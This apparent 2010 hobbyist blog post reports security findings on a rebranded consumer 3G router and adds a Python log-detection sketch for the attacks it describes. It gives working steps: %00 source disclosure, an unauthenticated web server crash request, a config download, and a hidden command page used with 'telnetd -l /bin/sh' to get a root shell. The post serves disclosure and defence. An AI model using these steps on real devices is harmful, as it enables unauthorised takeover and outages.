Ivo's blog

Hacks, code and random thoughts

Hacking the Zolid Mobile Router

written by ivo, on Jul 14, 2010 9:46:00 AM.

I recently bought a Zolid “wireless mobile router” at a local ALDI store. It’s a nifty little device with 2xUSB, 2xUTP, and b/g/n wireless. You can plug it directly in a socket or power it through micro usb. It also claims to have support for a wide range of 3G dongles so you can use it as a mobile 3G access point. It resembles some of the Linux plug servers like Sheevaplug and Guruplug. Here are some of my findings:

Versions

The Zolid (an ALDI brand) is a rebranded “Amigo 3R161N”, which is also sold by Solwise as the 3g11nmrw and as the E-Top 3r161n, though I can’t find it on the e-top website.

Software details

As I expected, it runs Linux:

Linux version 2.6.19 (root@localhost.localdomain) (gcc version 3.4.6-1.3.5) #1 Fri Feb 26 17:00:34 CST 2010

It has firmware “ver1.1.5” installed.

It uses the “GoAheader-Webs” webserver.

It uses Pure-FTPd as FTP server.

Firmware

It didn’t ship with a firmware on the CD. Unisupport.net (responsible for Zolid support) doesn’t offer anything for download either, and neither does Amigo. However, Solwise does have two firmwares available at the bottom of their product page.

I haven’t yet succeeded in dissecting the firmware (which helps to find backdoors, exploits, and so on, and may provide an opportunity to create a customized firmware). I think it starts with a “config.dat” file, but I have to research this further.

Hacks, details

Appending %00 to a .asp URL (other characters will also work, e.g. ///) will give you the unrendered source of the ASP page, e.g. http://192.168.1.132/status.asp%00

nmap reports the following open ports and fingerprint:

Interesting ports on default.fritz.box (192.168.1.132):
Not shown: 994 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
515/tcp   open  printer
49152/tcp open  unknown
MAC Address: 00:08:A1:C8:C9:C4 (CNet Technology)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

I have been able to find the following additional pages that are not part of the current navigation:
  • opmode.asp
  • one_button.asp
  • ap_one_button.asp
  • wifi_one_button.asp
  • tcpipwan.asp
  • qos.asp
  • downloadserver.asp (*)
  • stats.asp
(*) may crash the internal web server.

Crashing the web server is easy (no authentication required):

wget 'http://192.168.1.132/goform/foo'

Accessing “config.dat” will offer a download containing, I assume, the device’s configuration. It’s probably related to the saveconf.asp page. This file resembles the start of the firmwares I’ve been able to find.

Update

Thanks to info provided by Remco van Mook I’ve found a page on the Sapido gr-1102 which mentions an “obama.asp” page. It also works on the Zolid, and it allows you to execute arbitrary commands!

Executing /usr/sbin/telnetd -l /bin/sh as command will give you an immediate root shell through telnet.
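
A detection sketch for the requests described in this post, added here as an example (it is not code from the original post or from the vendor): it flags the %00 / trailing-junk ASP source disclosure, /goform/ requests, config.dat downloads, and requests to obama.asp or the unlinked pages. The Common Log Format input from a proxy or sensor in front of the router, the `KNOWN_GOFORM` allowlist, the `/config.dat` location and the sample log lines are assumptions.

```python
import re
from urllib.parse import unquote

# Assumption: Common Log Format lines from a proxy or sensor in front of the router.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "([A-Z]+) (\S+)')

# Pages the post lists as missing from the web UI navigation.
UNLINKED = {"opmode.asp", "one_button.asp", "ap_one_button.asp",
            "wifi_one_button.asp", "tcpipwan.asp", "qos.asp",
            "downloadserver.asp", "stats.asp"}
# Hypothetical allowlist of legitimate /goform/ handlers (the post names none).
KNOWN_GOFORM = set()

def classify(target):
    """Map a request target to the findings from the post that it matches."""
    path = unquote(target.split("?", 1)[0]).lower()   # %00 becomes a NUL byte
    stripped = re.sub(r"[^a-z0-9]+$", "", path)       # drop trailing NUL, ///, ...
    name = stripped.rsplit("/", 1)[-1]
    hits = []
    if stripped.endswith(".asp") and stripped != path:
        hits.append("asp-source-disclosure")
    if name == "obama.asp":
        hits.append("command-page")
    elif name in UNLINKED:
        hits.append("unlinked-page")
    if name == "config.dat":
        hits.append("config-download")
    if path.startswith("/goform/") and name not in KNOWN_GOFORM:
        hits.append("goform-unknown-handler")
    return hits

def scan(lines):
    """Return (source, target, findings) for every log line with a finding."""
    matches = (LOG_RE.match(line) for line in lines)
    return [(m.group(1), m.group(3), classify(m.group(3)))
            for m in matches if m and classify(m.group(3))]

# Constructed sample input, not captured from a real device.
SAMPLE = [
    '192.168.1.20 - - [14/Jul/2010:09:40:01 +0200] "GET /status.asp HTTP/1.1" 200 5120',
    '192.168.1.77 - - [14/Jul/2010:09:41:12 +0200] "GET /status.asp%00 HTTP/1.1" 200 9310',
    '192.168.1.77 - - [14/Jul/2010:09:41:40 +0200] "GET /goform/foo HTTP/1.1" 502 0',
    '192.168.1.77 - - [14/Jul/2010:09:42:05 +0200] "GET /config.dat HTTP/1.1" 200 20480',
    '192.168.1.77 - - [14/Jul/2010:09:43:30 +0200] "GET /obama.asp HTTP/1.1" 200 1800',
]

if __name__ == "__main__":
    for src, target, hits in scan(SAMPLE):
        print(src, target, ", ".join(hits))
```

Fill `KNOWN_GOFORM` with the handler names your own firmware's pages submit to, otherwise every /goform/ request is reported.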

Remaining questions

  • How can we dissect the firmware?
  • Shouldn’t sources and licenses be provided somewhere?
  • How can we hack/exploit this device?

Please keep an eye on this page for further updates. Respond in the comments if you have found anything interesting.